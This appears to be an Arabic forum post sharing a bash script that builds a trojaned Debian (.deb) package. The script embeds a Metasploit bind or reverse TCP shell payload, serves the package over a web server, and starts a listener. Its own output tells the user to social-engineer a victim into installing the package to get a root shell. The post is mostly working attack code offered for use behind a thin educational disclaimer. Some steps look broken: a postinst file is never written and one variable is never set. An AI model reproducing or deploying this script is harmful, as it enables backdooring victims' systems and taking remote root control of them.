سكربت جميل يقوم بعمل باك دور لأنظمة دبيان والتوزيعات التي تستخدم تحزيم .deb بالاعتماد على مشروع ميتاسبلويت بسهولة تامة
كود PHP:
#!/bin/bash
# bash script to generate a Debian (.deb) package trojan using Metasploit payload # Author: Aaron Hine - @redmeat_uk # Date: 31-01-2010
# Disclaimer: this script should be used for educational purposes. You should obtain permission before running this against an indvidual or company. # The author is not liable for any illegal use of this script.
scriptname=`basename "$0"`
if [[ $UID -ne 0 ]]; then echo "${scriptname} must be run as root" exit 1 fi
# echo echo "#####################################################################" echo "Script to generate a Debian package trojan using a Metasploit payload" echo "#####################################################################" echo
# change these vars to suit your needs msfdir="/opt/metasploit3/msf3" tmpdir="/tmp/evildeb" workdir="$tmpdir/work"
# prompt for package name and setup dirs echo "Please enter the name of the APT package you wish to trojan:" echo "Use apt-cache search <package> for ideas :)" echo read package apt-get --download-only install $package echo mkdir $tmpdir mkdir $workdir mv /var/cache/apt/archives/$package* $tmpdir mkdir $workdir/DEBIAN dpkg -x $tmpdir/$package* $workdir apt-cache show $package > $workdir/DEBIAN/control cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2 mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control echo echo "Please choose your Metasploit payload" echo "-------------------------------------" echo echo "1. bind tcp" echo "2. reverse tcp" echo echo "press number and hit return:" read choice
if [ "$choice" -eq 1 ]; then payload="linux/x86/shell/bind_tcp" echo "Enter IP:" read rhostIP echo "Enter port:" read bindport options="RHOST=$rhostIP LPORT=$bindport" else if [ "$choice" -eq 2 ]; then payload="linux/x86/shell/reverse_tcp" echo "Enter IP:" read lhostIP echo "Enter port:" read revport options="LHOST=$lhostIP LPORT=$revport" fi fi
echo echo "Please enter the filename for the Metasploit payload:" read filename echo
cd $workdir binary=`find . -executable -type f | grep $package | sed -e 's/^.//'` trojan="$filename"
echo "Thanks - generating your payload..." $msfdir/msfpayload $payload $options X > $workdir/$trojan2 echo
cd $workdir/DEBIAN chmod 755 postinst dpkg-deb --build $workdir cd $tmpdir
echo echo "Please enter your webroot directory:" read webroot mv $tmpdir/work.deb $webroot/$package.deb rm -rf $tmpdir
echo echo "Trojan'd $package.deb created and placed in $webroot" echo
webserver="python -m SimpleHTTPServer 80"
echo "Would you like a Python webserver ? (y/n) :" read svr echo
if [[ "$svr" == "y" || "$svr" == "Y" ]]; then cd $webroot $webserver & echo else echo "Fair nuff, setup your own webserver :)" echo fi
sleep 1
echo "Would you like me to setup a metasploit handler ? (y/n) :" echo read handler echo echo "In the meantime, social engineer your victim in to browsing to your package" echo "and get them to install it and wait for your root shell >)" echo
if [[ "$handler" == "y" || "$handler" == "Y" ]]; then echo $msfdir/msfcli exploit/multi/handler payload=$payload $options E else echo "Fair nuff, setup your own handler :)" echo fi